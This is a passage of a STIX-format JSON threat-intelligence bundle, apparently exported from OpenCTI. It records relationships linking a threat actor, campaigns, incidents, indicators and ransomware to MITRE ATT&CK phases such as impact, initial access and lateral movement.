"x_opencti_id": "c97c9c83-e5dc-47f8-a3ec-3c287997fb1a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--01ec830f-d69f-4ec7-8b31-df27320c60ca",
"type": "relationship",
"relationship_type": "related-to",
"description": "[email protected] was also used to register the C2 of multiple Maze campaigns analyzed by Proofpoint and attributed to the TA2101 threat actor.",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"created": "2020-01-07T15:00:58.124Z",
"modified": "2020-01-07T15:00:58.124Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f509d225-f82b-4dce-9d29-9ec6c7bd9f87",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5bb1db7e-66f7-4edc-bb45-f862d47299a3",
"type": "relationship",
"relationship_type": "uses",
"description": "Delete shadow copies",
"source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"target_ref": "attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"x_opencti_source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_target_ref": "attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"created": "2020-02-04T15:00:06.930Z",
"modified": "2020-02-04T15:00:06.930Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4622fbab-2721-4118-92d0-c05c6ed52786",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--6239433a-7b9a-478f-9e4e-4c7ced862958",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"target_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"x_opencti_source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"x_opencti_target_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"created": "2020-02-04T15:11:31.786Z",
"modified": "2020-02-04T15:11:31.786Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8ea0c05f-dc20-4d08-9506-ffd411761c6e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--508b19b9-30a8-44ac-b2d5-b010fdd30dbd",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"x_opencti_source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"x_opencti_target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"created": "2019-07-29T12:48:18.000Z",
"modified": "2019-07-29T12:48:18.000Z",
"x_opencti_first_seen": "2019-05-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-05-15T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_id": "c171be3e-dd78-4012-ac09-bc21f1a440eb"
},
{
"id": "relationship--bcfa95a6-9978-4477-95f4-666308e2f316",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"target_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"x_opencti_source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"x_opencti_target_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"created": "2020-01-08T16:10:18.215Z",
"modified": "2020-01-08T16:10:18.215Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8d27cea5-a656-449e-91a9-b2d1f4bd1fc5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--36de8086-e0b8-4857-959b-223a5e4d70ff",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"target_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"x_opencti_source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"x_opencti_target_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"created": "2020-02-04T15:39:26.456Z",
"modified": "2020-02-04T15:39:26.456Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c7cffb41-5953-4d29-9007-5eb20ceaf147",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--98657e57-423b-4d22-918f-f7e6c0bace20",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"target_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"x_opencti_source_ref": "incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"x_opencti_target_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"created": "2020-02-04T16:02:27.182Z",
"modified": "2020-02-04T16:02:27.182Z",
"x_opencti_first_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_last_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "76df2a68-a3da-40e5-a03c-496284ed722f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f6457544-4232-492a-9900-fdc16e2120ba",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:00:01.093Z",
"modified": "2020-02-05T10:00:01.093Z",
"x_opencti_first_seen": "2020-02-05T10:00:01.093Z",
"x_opencti_last_seen": "2020-02-05T10:00:01.093Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2184aa69-9bb1-411b-ac8a-997fcbb7a1bb",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--40934950-668c-4222-af9d-86861a673d64",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:45.777Z",
"modified": "2020-02-05T10:04:45.777Z",
"x_opencti_first_seen": "2020-02-05T10:04:45.777Z",
"x_opencti_last_seen": "2020-02-05T10:04:45.777Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "34094eb4-aa91-47ad-8408-e68cb3c7b6d5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--63e10ccf-fcc5-420a-85e3-0ba606e424df",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:04.921Z",
"modified": "2020-02-05T10:06:04.921Z",
"x_opencti_first_seen": "2020-02-05T10:06:04.921Z",
"x_opencti_last_seen": "2020-02-05T10:06:04.921Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "68b09d26-2acb-44d4-9f46-606a2126e8b5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c3b77fd7-ca97-49cd-a456-55a84e5dbfb0",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:25:23.591Z",
"modified": "2020-01-07T14:25:23.591Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "32cc1b75-c06c-4496-8936-f5eab8abdc3c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--dee7e50e-824d-454a-93e2-034aa7234977",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"created": "2020-01-07T14:39:25.904Z",
"modified": "2020-01-07T14:39:25.904Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ad4fdf09-8ac3-45e9-bc8a-f24870567555",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
]
},
{
"id": "relationship--163d2fe5-2f5d-4b90-9c8e-2938d27e6ed8",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:38:59.211Z",
"modified": "2020-01-07T14:38:59.211Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8757c553-604a-43ab-8a4b-1c87af7ccbe4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--fe3b22f8-caf6-4297-addd-8ead11501140",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:51:01.682Z",
"modified": "2020-02-04T14:51:01.682Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8c135e8b-99ad-4d20-b2fd-018383275d63",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--00d6f9a5-ba28-4c36-aa96-6a895c0f59d3",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"created": "2020-02-04T15:22:04.023Z",
"modified": "2020-02-04T15:22:04.023Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b8fd5c74-acea-4ba2-8c31-d0339619a94d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f194dfc2-1bb0-4aab-9200-87071915f98e",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-08T16:04:37.951Z",
"modified": "2020-01-08T16:04:37.951Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0a07f67c-0b0e-4afb-8cf7-d77d7a6eb2a4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--a79bd633-8557-4c5b-8381-24ea5795b0d1",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-04T16:06:09.092Z",
"modified": "2020-02-04T16:06:09.092Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-11-17T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8040f346-08e9-4a37-8447-59f7290ff66a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--a79dd61a-17db-4744-92d3-04f51f2d0337",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T09:20:22.427Z",
"modified": "2020-02-05T09:20:22.427Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a6c82516-0345-4334-b180-1798a0873646"
},
{
"id": "relationship--3ccd9fb3-48d9-47b8-bb1d-f3abff658a7d",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T09:45:57.291Z",
"modified": "2020-02-05T09:45:57.291Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ba3732c5-c652-4779-88d9-6ec4a0578209",
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--d8e74e08-bb66-4fd5-b3cd-5c79c397bf0d",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:54.076Z",
"modified": "2020-02-05T10:04:54.076Z",
"x_opencti_first_seen": "2020-02-05T10:04:54.076Z",
"x_opencti_last_seen": "2020-02-05T10:04:54.076Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a79c56bf-cbe1-46bc-8473-7e9a5a24ef86",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--75f5674b-2500-475a-aa55-6f77fa6ab9f7",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--6e479260-bd34-45c4-802f-a236533127f0",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--6e479260-bd34-45c4-802f-a236533127f0",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:06.017Z",
"modified": "2020-02-05T10:05:06.017Z",
"x_opencti_first_seen": "2020-02-05T10:05:06.017Z",
"x_opencti_last_seen": "2020-02-05T10:05:06.017Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7d2b2d7d-9190-4cc0-b817-ce364e9a9029",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c093a59f-7770-4ab1-8ea9-d2a1b6d8494f",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:11.921Z",
"modified": "2020-02-05T10:05:11.921Z",
"x_opencti_first_seen": "2020-02-05T10:05:11.921Z",
"x_opencti_last_seen": "2020-02-05T10:05:11.921Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "1165660f-1898-44a0-84be-97ca6ce8c35c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--d345dfdc-78d4-4473-b960-246c87a2698b",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:17.378Z",
"modified": "2020-02-05T10:05:17.378Z",
"x_opencti_first_seen": "2020-02-05T10:05:17.378Z",
"x_opencti_last_seen": "2020-02-05T10:05:17.378Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5b989d21-405d-418a-bf8c-209f4079ef72",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--33e0e467-ed31-42f7-8939-1b07cd379eef",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:26.022Z",
"modified": "2020-02-05T10:05:26.022Z",
"x_opencti_first_seen": "2020-02-05T10:05:26.022Z",
"x_opencti_last_seen": "2020-02-05T10:05:26.022Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ebdefda0-56fb-433b-bfea-64365bb5c6f1",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--6823218c-aa3c-4d09-965f-17725774d37b",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:41.167Z",
"modified": "2020-02-05T10:05:41.167Z",
"x_opencti_first_seen": "2020-02-05T10:05:41.167Z",
"x_opencti_last_seen": "2020-02-05T10:05:41.167Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "408232ad-f2b2-4a3e-9990-1ac1873576a3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--3fc721da-63c0-4366-b3fb-44fca7aa4e59",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:49.754Z",
"modified": "2020-02-05T10:05:49.754Z",
"x_opencti_first_seen": "2020-02-05T10:05:49.754Z",
"x_opencti_last_seen": "2020-02-05T10:05:49.754Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5b254d7d-3724-4da9-8048-49f4e3bad9f2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--10f038ce-870a-4203-a972-661a383cbd06",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:59.249Z",
"modified": "2020-02-05T10:05:59.249Z",
"x_opencti_first_seen": "2020-02-05T10:05:59.249Z",
"x_opencti_last_seen": "2020-02-05T10:05:59.249Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "8fbb5920-0ec5-4ecc-9629-2850f1f528a8",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0d4b8802-e9ab-4a81-9b4f-6893e8c72165",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T14:31:49.477Z",
"modified": "2020-02-04T14:31:49.477Z",
"x_opencti_first_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b8dc512d-7d59-41b0-b4f0-d6dbdf28e4cd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--f86b3029-477d-456c-b69e-7f957e9a0ecc",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:44:10.984Z",
"modified": "2020-02-04T14:44:10.984Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "9b9cee87-d817-4f42-a877-1ae083d55408",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
},
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
}
]
},
{
"id": "relationship--f830e01a-1d45-42fc-86bc-49bde9def60b",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
